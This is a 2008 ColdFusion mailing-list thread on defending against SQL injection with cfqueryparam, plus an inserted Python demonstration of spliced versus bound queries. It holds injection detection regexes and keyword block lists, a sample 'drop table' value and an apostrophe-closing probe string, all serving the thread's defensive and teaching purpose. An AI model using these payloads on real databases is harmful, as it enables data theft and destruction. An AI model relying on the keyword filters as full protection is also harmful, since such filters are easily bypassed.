(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309634
Second to last sentence should read .... "you are safe from damage to the
db"
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't
have other problems. But it does mean that executing arbitrary code against
the DB using user inputs (form, url, cookie) is no longer possible. When the
system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah;
drop table foo"/> it will bind those characters to a variable of the type
"char". Unless you are subsequently executing that char string as dynamic
SQL somewhere (like in an SP) you are from damage to the DB. Of course there
are plenty of other things to worry about :)
-Mark
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309633
Yeah I was reading in the forum this one, that using SELECT * is not good,
can u explain why on short example? What is Pro and Cons what other type of
security it gonna give me? Thanks
Radek
On Thu, Jul 24, 2008 at 1:39 PM, Brad Wood <brad@bradwood.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309632
That's fair enough from a security stand point, but I still use cfqueryparam
with MS SQL for performance reason.
When your database executes a SQL statement, it generates an execution plan
that best fits that statement and it caches that plan in memory for later
use (so it doesn't have to be generated again which is costly). The cached
execution plan will ONLY be used for other queries that are the EXACT same.
Keep in mind also that your database server has a limit to how many plans it
will cache.
If you output an order number directly into the query and then view
different 100,000 orders, your SQL server will try and cache 100,000
different plans.
Select order_id From orders Where order_id = 1
Select order_id From orders Where order_id = 2
Select order_id From orders Where order_id = 3
Select order_id From orders Where order_id = 4
etc...
Needless to say, that is a waste of resources, and it won't keep that many
plans anyway. Chances are, other useful plans will get pushed out of memory
to make room. However, if all your inputs are parameterized, then all those
SQL statements are now IDENTICAL and share the same plan:
Select order_id From orders Where order_id = (param)
This single plan can be reused for all 100,000 orders which means other
queries won't have their plans purged out of memory.
There is a valid discussion about the use of non-optimal plan, but as a
general rule, I wouldn't let that stop you from the best practice.
~Brad
> Ok, then let's say that CFQP should always be used with MySQL...
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309631
Using CFQUERYPARAM will secure your DB calls. That doesn't mean you don't
have other problems. But it does mean that executing arbitrary code against
the DB using user inputs (form, url, cookie) is no longer possible. When the
system sees something like "<cfqueryparam type="CF_SQL_CHAR" value="blah;
drop table foo"/> it will bind those characters to a variable of the type
"char". Unless you are subsequently executing that char string as dynamic
SQL somewhere (like in an SP) you are from damage to the DB. Of course there
are plenty of other things to worry about :)
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Do you think when I am using cfqueryparams for example with numbers like
this is secured?:
SELECT * FROM product WHERE productoid=<cfqueryparam
value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6">
Another example I am thinking worse is with text, I made it like this:
SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#"
cfsqltype="CF_SQL_VARCHAR" maxlength="22">
I added maxlength to as more security, with PRODUCTOID it is always 6, and
text no more than 22, do you think this should work to
secure the site?, not talking about permissions to database etc, just about
cfqueryparams.
> Excuse me... But why are you checking script_name and Path_info for
"EXEC("
> .... Both of these are generated on the web server - not sent by the
> browser... So I'd be interested to know your reasoning. Also, form
> elements are not part of the "query_string" since they are passed in a
form "body"
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309629
Radek, what you did is exactly correct. (Well, some people might bust your
balls for the select *, but that's another performance/bug related
discussion)
Just make sure you get EVERY vulnerable query in your site. It only takes
one bad apple...
~Brad
> Do you think when I am using cfqueryparams for example with numbers like
> this is secured?:
Author: Radek Valachovic
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309628
Do you think when I am using cfqueryparams for example with numbers like
this is secured?:
SELECT * FROM product WHERE productoid=<cfqueryparam
value="#url.productoid#" cfsqltype="CF_SQL_INTEGER" maxlength="6">
Another example I am thinking worse is with text, I made it like this:
SELECT * FROM item WHERE L3=<cfqueryparam value="#url.L3#"
cfsqltype="CF_SQL_VARCHAR" maxlength="22">
I added maxlength to as more security, with PRODUCTOID it is always 6, and
text no more than 22, do you think this should work to
secure the site?, not talking about permissions to database etc, just about
cfqueryparams.
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309627
>>Not if you use MySQL. That DBMS allows for an alternative way to escape
those with a backslash.
Ok, then let's say that CFQP should always be used with MySQL...
>>.. and you haven't turned off MySQL's default ways of escaping those
ticks
.. IF you have not turned off MySQL's default ways of escaping those ticks.
Anyway, IMHO letting MySQL escape anything like \b to a backspace character
or \r as a carriage return is asking for trouble.
Look at the possibility of messing up directory names stored in the
database, unless
you escape all backslashes yourself, a PITA, CF won't do it for you.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309626
Not if you use MySQL. That DBMS allows for an alternative way to escape
those with a backslash.
This has been a much blogged topic recently.
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
http://www.coldfusionmuse.com/index.cfm/2008/2/22/sql-injection-on-a-character-field
http://www.coldfusionmuse.com/index.cfm/2008/5/16/disable-backslash-escape-on-mysql
This is the technicality I was citing when I disagreed with Dave Watts the
other day about calling stored procs inline.
If you have a cfquery and a character field enclosed in single ticks and you
haven't turned off MySQL's default ways of escaping those ticks, you CAN GET
HACKED if you are not using cfqueryparam.
I've demonstrated a working example on the first link I provided.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309625
>>Closing the apostrophe is exactly how SQL injection occurs with text
field
Ok, you got it!
BUT CFQUERY will escape that apostrophe anyway, so that the SQL injection
will
just be part of the string stored in the field either you use CFQP or not.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309623
Closing the apostrophe is exactly how SQL injection occurs with text field
and if you are using MySQL it is a very real possibility.
~Brad
> >>ANY string passed into cfqueryparam cannot be executed as SQL:
>
> Is it really possible to get an SQL statement executed from a string for
> a text field
> without closing the string first with an apostrophe?
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309622
>>Jeez, and value="URL.TryToHackThis" should be
value="#URL.TryToHackThis#"
... so you see that CFQP is not that easy to use ;-))
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309621
>>ANY string passed into cfqueryparam cannot be executed as SQL:
Is it really possible to get an SQL statement executed from a string for
a text field
without closing the string first with an apostrophe?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309620
Jeez, and value="URL.TryToHackThis" should be value="#URL.TryToHackThis#"
That's what I get for answering at midnight.
On Thu, Jul 24, 2008 at 11:57 PM, James Holmes <james.holmes@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309619
Obviously cfsqltype="varchar" should be cfsqltype="cf_sql_varchar" (my typo).
On Thu, Jul 24, 2008 at 11:55 PM, James Holmes <james.holmes@gmail.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309618
I'll say it again.
ANY string passed into cfqueryparam cannot be executed as SQL:
select somecolumn
from sometable
where someothercolumn = <cfqueryparam cfsqltype="varchar"
value="URL.TryToHackThis">
It is irrelevant what gets passed in the URL.TryToHackThis; it cannot
be executed as a SQL statement. It's bound to the query as a
parameter.
On Thu, Jul 24, 2008 at 11:44 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
> >>So you know that it *always* prevents SQL injection in a standard
> query (select, update or delete).
>
> Really? Can you give an example of injection that will be prevented?
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
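The point James makes here (and the apostrophe-closing case Brad and Claude discuss in the replies above) as an added example, written in Python with sqlite3 rather than CFML; this is not code from the thread. The `item` table with its `L3` column mirrors Radek's query, and the rows and the probe value are constructed for the example. `lookup_unsafe` splices the value into the SQL text the way an un-parameterized cfquery does; `lookup_bound` sends it as a bind parameter, as cfqueryparam does.

```python
import sqlite3

# Constructed sample schema, modelled on the "item" / "L3" query quoted in the
# thread; the rows and values are invented for this example.
SAMPLE_ROWS = [("alpha",), ("beta",), ("gamma",)]

# The bound form always sends this exact SQL text, whatever the value is.  That
# is also what lets the database reuse one execution plan for every lookup.
BOUND_SQL = "SELECT L3 FROM item WHERE L3 = ? ORDER BY id"


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE item (id INTEGER PRIMARY KEY, L3 TEXT NOT NULL)")
    conn.executemany("INSERT INTO item (L3) VALUES (?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, l3: str) -> list:
    """The un-parameterized form: the value is spliced into the SQL text, as in
    a cfquery that interpolates #url.L3# inside quotes without cfqueryparam."""
    sql = f"SELECT L3 FROM item WHERE L3 = '{l3}' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn: sqlite3.Connection, l3: str) -> list:
    """The cfqueryparam-style form: the value travels as a bind parameter, so
    the database compares it as data and never parses it as SQL."""
    return [row[0] for row in conn.execute(BOUND_SQL, (l3,))]


def store_bound(conn: sqlite3.Connection, l3: str) -> None:
    """Insert a value through a bind parameter; whatever it contains is stored
    verbatim as a string, never run."""
    conn.execute("INSERT INTO item (L3) VALUES (?)", (l3,))
    conn.commit()


if __name__ == "__main__":
    conn = make_db()
    probe = "x' OR '1'='1"   # constructed: a value that closes the apostrophe
    print("ordinary value, unsafe:", lookup_unsafe(conn, "alpha"))
    print("ordinary value, bound: ", lookup_bound(conn, "alpha"))
    print("probe value, unsafe:   ", lookup_unsafe(conn, probe))   # every row
    print("probe value, bound:    ", lookup_bound(conn, probe))    # no rows
    store_bound(conn, probe)
    print("after storing probe:   ", lookup_bound(conn, probe))    # the literal string
```

For an ordinary value both forms return the same row. For the probe value the spliced form turns the WHERE clause into `L3 = 'x' OR '1'='1'` and returns every row, while the bound form compares the whole string against `L3` and returns nothing; once stored through a bind parameter, the probe comes back as exactly the string that went in. The bound SQL text is also identical for every value, which is the plan-reuse argument Brad makes elsewhere in the thread.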
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309616
>>So you know that it *always* prevents SQL injection in a standard
query (select, update or delete).
Really? Can you give an example of injection that will be prevented?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309614
So you know that it *always* prevents SQL injection in a standard
query (select, update or delete). That's a good enough reason to
always use it for me.
On Thu, Jul 24, 2008 at 10:58 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309611
This is not the only case. If you use pooled statements on the
datasource (which is a default for CF) you can demonstrate another
case:
Create a table.
Select * from it in a CF template.
Add a column to the table in the DB.
Run the same template again.
See the problem.
On Thu, Jul 24, 2008 at 11:20 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309608
>>It shouldn't make a difference if the SELECT * is in a cfquery
I see.
A very particular situation though. It will not prevent me from using
SELECT * when
I need all fields. This is more efficient than list all of them.
On the opposite, using SELECT * just to get a record count is the worse
case.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Jim Wright
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309606
On Thu, Jul 24, 2008 at 10:52 AM, Claude Schneegans <
schneegans@internetique.com> wrote:
>
> It may be a silly question, but why a SELECT * will break because an
> unused column
> was dropped?
>
It shouldn't make a difference if the SELECT * is in a cfquery (though that
is bad practice, too), but if it is in a view, it will break...such as this
example (in SQL Server, at least)...
CREATE TABLE tmpTest(foo int,bar int)
GO
CREATE VIEW tmpView AS SELECT * FROM tmpTest
GO
SELECT * FROM tmpView --Works correctly
GO
ALTER TABLE tmpTest DROP COLUMN bar
GO
SELECT * FROM tmpView --Throws error
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309605
Try telling that to Billy, he just got fired!
>>Do you fully understand what cfqueryparam does when binding text
parameters into the query?
Yes, fully.
I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware
of the way ODBC or JDBC drivers work.
This is precisely why I can say when it is useful and when it is not.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309603
>>Do you fully understand what cfqueryparam does when binding text
parameters into the query?
Yes, fully.
I've designed CFX_ODBCinfo, and some other tools, and I'm pretty aware
of the way ODBC or JDBC drivers work.
This is precisely why I can say when it is useful and when it is not.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309600
>>In our case, what
happened was that we dropped a column that hadn't been in use for awhile,
and everything broke because of the SELECT * and cfqueryparam.
It may be a silly question, but why a SELECT * will break because an
unused column
was dropped?
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309592
>>But Billy has been told to turn:
SET myValue = #someOtherQuery.someOtherValue#
into:
SET myValue = #FORM.someOtherValue#
Then obviously, he should add CFQP to the line of code in the same time,
what's the problem?
My point is just that in some situations, CFQP is useless,
of course, if you change your code, then it is a new code, with a new
situation.
I don't see your argument.
Would you also use CFLOCK around CFSET of any variable, just in case
some variable is
moved to the session scope some day? (in CF5 for this example)? C'mon... ;-)
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309589
Do you fully understand what cfqueryparam does when binding text
parameters into the query?
On Thu, Jul 24, 2008 at 9:54 PM, Claude Schneegans
<schneegans@internetique.com> wrote:
> 2. if both fields are text, CFQUERYPARAM won't detect anything harmful
> and won't help anyway.
--
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309588
But Billy has been told to turn:
SET myValue = #someOtherQuery.someOtherValue#
into:
SET myValue = #FORM.someOtherValue#
because Nigel in accounts wants to do his own thing.
If cfqp is in place, Billy will leave it there. He might not add it if it's
not!
Poor Billy...
>>and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there?
This is irrelevant, because:
1. if both fields are numeric, there is no possibility
OtherQuery.someOtherValue can
contain anything harmful;
2. if both fields are text, CFQUERYPARAM won't detect anything harmful
and won't help anyway.
3. if both fields have different types, then you should have fired your
db administrator, or
your developer, or both, a long time ago ;-)
in this case, the least you should do is to check the compatibility
of values BEFORE running the query,
and eventually make the appropriate conversion.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Dave Phillips
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309587
Adrian,
Thanks - I was wondering if I was EVER going to get a dissenting opinion!
;-)
I should clarify my previous statements by referring to "production level
code". I too use SELECT * when I'm doing test or development, and then, if
that script is ever going to make it into production, I go back and then
specify only the columns I need.
As for changing the SQL slightly, you are correct, that will force it to
work again, however, if you are dealing with a production control system and
you can't just 'tweak' the code without going through some sort of change
control process, then it will drive you NUTS (which it probably does
anyway). The idea is that to avoid the error completely, avoid the SELECT
*, and then you won't even have to touch the code at all.
In our environment, when we are ready to implement a change that requires DB
changes, often we put the db changes in before the code goes in (sometimes
even a day or more in advance), as long as they are DB changes that won't
break existing code, like 'adding columns', for example. In our case, what
happened was that we dropped a column that hadn't been in use for awhile,
and everything broke because of the SELECT * and cfqueryparam. Cfqueryparam
was initially blamed, but that wasn't the real problem, of course.
In any case, I made the 'generalized' statement on purpose hoping someone
would give me a reason to believe otherwise, and, as far as production level
code is concerned, I'm still not convinced. :)
Dave
Dear Dave Phillips, you have made a generalisation and I have a dissenting
opinion ;O)
I use SELECT * for quick and dirty scripts, always have done, always will
do.
Another way around the error is to change your SQL slightly. Throw in a line
break and a different execution plan is used.
No it's not ideal, but it works if you come across this problem.
Adrian
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309586
>>and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there?
This is irrelevant, because:
1. if both fields are numeric, there is no possibility
OtherQuery.someOtherValue can
contain anything harmful;
2. if both fields are text, CFQUERYPARAM won't detect anything harmful
and won't help anyway.
3. if both fields have different types, then you should have fired your
db administrator, or
your developer, or both, a long time ago ;-)
in this case, the least you should do is to check the compatibility
of values BEFORE running the query,
and eventually make the appropriate conversion.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Robert Harrison
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309585
Add one to the list. One of my old sites just got brought down. We restored
the DB and fixed it. That lasted about 15 minutes.
Now, how to deal with code fixing 40 old sites that we don't get paid
maintenance for. ARRRGH!
Robert B. Harrison
Director of Interactive services
Austin & Williams
125 Kennedy Drive, Suite 100 Hauppauge NY 11788
T : 631.231.6600 Ext. 119
F : 631.434.7022
www.austin-williams.com
Great advertising can't be either/or... It must be &.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309582
Ok, I understand why you think it's ridiculous, but here's a reason to do
it.
What if you have:
UPDATE myTable
SET myValue = #someOtherQuery.someOtherValue#
and Billy New-Developer comes along and decides that
someOtherQuery.someOtherValue could really do with coming directly from the
user? Will he add the cfqp if it's not already there? Maybe, maybe not.
Having said that, I have queries that aren't cfqp'd because the data comes
from in the page.
Just a though.
Adrian
>>Bottom line: ***always*** use cfqueryparam. Period. There are no
acceptable "exceptions to the rule".
Even with something like
UPDATE myTable SET myDate = <cfqueryparam value = "#now()#" CFSQLType
= "CF_SQL_TIMESTAMP">?
OR this:
UPDATE myTable SET myValue = <cfqueryparam value =
"#someOtherQuery.someOtherValue#" CFSQLType = "CF_SQL_INTEGER ">?
Just ridiculous.
OK, it "improves performance", if you care about micro seconds, but
there is no security aspect here.
The increase of performance can make a significant difference only for
very big queries or very repetitive code.
As the docs says: "Bind variable usage enhances performance when
executing a cfquery statement multiple times."
Otherwise, the advantage is only for security purpose,... and there is a
risk only for variables set by a visitor.
If the content is set by your CF program itself, where is the risk? It
is like putting a lock on an empty box.
Personally, I care more about code readability than useless security.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309581
Dear Dave Phillips, you have made a generalisation and I have a dissenting
opinion ;O)
I use SELECT * for quick and dirty scripts, always have done, always will
do.
Another way around the error is to change your SQL slightly. Throw in a line
break and a different execution plan is used.
No it's not ideal, but it works if you come across this problem.
Adrian
And for those of you who take this advice and DO use cfqueryparam
***always*** make sure you NEVER use SELECT * (which you shouldn't do
anyway).
I inherited an application that had a ton of SELECT * all over it and no
cfqueryparam tags. Over the years I added cfqueryparam tags as I worked on
the application, adding new features, and updated old ones/fixing bugs.
Then I ran into a situation. If I didn't update the SELECT * to include
actual column names, and one of the column names got dropped from the table
I was referencing in my SELECT query with a cfqueryparam, then BAM, the
application would break.
Two hard and fast rules to live by:
1. Use cfqueryparam - ALWAYS
2. Use SELECT * - NEVER
I'm sure someone will now provide some comment as when generalizations are
usually made, someone has a dissenting opinion (to which, of course, you are
fully entitled!) :)
Sincerely,
Dave Phillips
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309577
What if the hacker puts a space between EXEC and the (?
What about if I put:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
in my all cf files on my web site and if hacker gonna try to run any of this
files for example:
index.cfm?+code, mail.cfm?+code etc basically it attacks all on google
indexed, but if u put in all of the files, it should abort the connection
every time when one of the files is executed and then any query won't be
executed....it should work...what do you think?
Radek
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309578
>>Keywords and banning IPs by themselves are not the answer
Exactly. But it helps to reduce the impact.
There is no panacea, only a set of measures.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309576
I'd be leery of simply looking for the word cast, or declare, or exec by
themselves. Better to include them as part of a regular expression that also
looks for semi-colons and ( like so:
REFindNoCase(';.*EXEC.*\(?.*\)?',VARIABLES.qString)
That looks for a ;, followed by any character (any number of times), then
EXEC, followed by any character (any number of times), then 0 or 1 (,
character, then finally 0 or 1 ).
That's not perfect, but it's better than just looking for those keywords
which could legitimately be included.
One of my websites got hit.. I always use cfqueryparam - at least for the
last few years, but some old code (this website started with version 1 of
CF) was still hanging around that was unprotected. I used that scanning
tool and it found about 20 unprotected queries out of about 20,000...
anyway - I set up a filter in the application.cfm to watch for a few of
these bad keywords..and temporarily ban those IPs.. I am getting hit a few
times a minute now.. on all of the websites I run.. however, one of the
owners got banned when he included the word "Declare" in a product
description:)
for this attack, I am thinking wouldn't it be wise to remove permission to
use the sysobjects and syscolumns from the user I access the MS SQL server
with from CF? (In other words, I am assuming that cf does not need access
to these tables - does it?)
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309575
>>var listSQLInject =
"cast,exec,execute,sp_executeSQL,revoke,grant,select,insert,update,delete,dr
op,--,'";
Don't forget to include "user" in your list. The first thing hackers try
generally is to get to
your table of users and passwords.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Adrian Lynch
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309574
And what about my page exec(.cfm?! :OD
Just checking my logs now and I'm getting hit by this too.
cfqp'd all the way though...
Even easier than monkeying with every single one of your cfquery's.... just
add following line to the TOP of all your application.cfm's:
<cfif cgi.SCRIPT_NAME contains "EXEC(" OR cgi.PATH_INFO contains "EXEC(" OR
cgi.QUERY_STRING contains "EXEC("><cfabort></cfif>
This will immediately shut down execution of any CFM that this piece of
trash tries to invoke to execute this particular type of SQL for.
peace, j
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309573
>>This is a classic reason why that sort of blocking method
is in my opinion only useful for a temporary stop gap.
It is actually only safe and useful for numeric parameters or dates, but
for text fields
obviously, something more accurate must be used.
And CFQUERYPARAM won't help either.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309572
Gabriel,
Ok... Point taken - you are not peppering the list :) I like the regex below
- thank you. That's a useful addition to the discussion.
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309565
Thanks for that link Gabriel. I'm sure it was intended for black hats, but
I think stuff like that should be required reading for any web programmer.
It's easier to defeat the enemy when you understand what they are doing.
~Brad
> Mark,
>
> The comment block obfuscation technique has been posted on blog articles
> that I have read through the years, however
> http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems
to be the
Author: Gabriel
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309564
Mark,
The comment block obfuscation technique has been posted on blog articles
that I have read through the years, however
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ seems
to be the
only one that I can pull up after a 30 second search. Needless to say I am
almost certain that I have seen working examples in the past, which has led
me to attempt to scan for them.
// Separator chars
CS = '.|[^[:alnum:]]';
// Short list of db objects to protect
DBObj.short = 'database|function|procedure|role|table|trigger|user|view';
// Build the regex
blackList = '@@|' &
'alter(#CS#)*?(#DBObj.short#)|' &
'cast(#CS#)*?\(|' &
'char(#CS#)*?\([[:alnum:]]{2}\)|' &
'create(#CS#)*?(#DBObj.short#)|' &
'declare(#CS#)*?(@|cursor)|' &
'delete(#CS#)*?from(#CS#)*?_|' &
'drop(#CS#)*?(#DBObj.short#)|' &
'exec(#CS#)*?\(|' &
'insert(#CS#)*?values(#CS#)*?\(+?|' &
'sysObjects|' &
'truncate(#CS#)*?table|' &
'update(#CS#)*?set(#CS#)+?|' &
'(s|x)p_[[:alnum:]_]+?|' &
'(\''(#CS#)*?(--)+?)|' &
'((--)+?(#CS#)*?\'')|' &
'/\*(#CS#)*?\*/';
An incomplete, but reasonable regex that allows individual keywords to pass
assuming that there are no other characters|keywords which would indicate a
possible threat in the parsed string, also includes a scan for block quotes
(even if only for my own peace of mind - white space obfuscation and word
split). I would do better, however I am not generally granted free licence
to spend time posting to discussion lists while I am supposed to be working
- else I would have written/posted actual code earlier.
What was the point of my original post then?
To illustrate that the list/array check is not a good enough solution, even
as a stop gap and to get people to perhaps look at doing a little more
research on their 'patch' before they go away and dedicate the requisite
hours to find and repair all missing queryparams etc, leaving their sites
still vulnerable. Sites are still being hit - is it better to wait 12 hours+
to make the point, or get the idea into someone's head now?
Just a note: I don't think a single post qualifies as 'peppering', nor do I
believe that pointing out legitimate flaws qualifies as pedantic.
G
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57065#309563
My thinking is:
The way it appears, a zombie will hit about 2 -12 pages on my web
server - over the course of a few seconds - then leave me alone..
On the first page they hit, if I ban them, then the next 1 to 11
tries will not succeed even if they happen to find a vulnerable file
anywhere on the server.
This attack appears to be well coordinated.. I get hit by one IP for
a few seconds, then it switches to another IP address for a few
seconds and I never see the first one again.. a few overlap so I may
see 3 or 4 different IPs at a time, but never more than that so far..
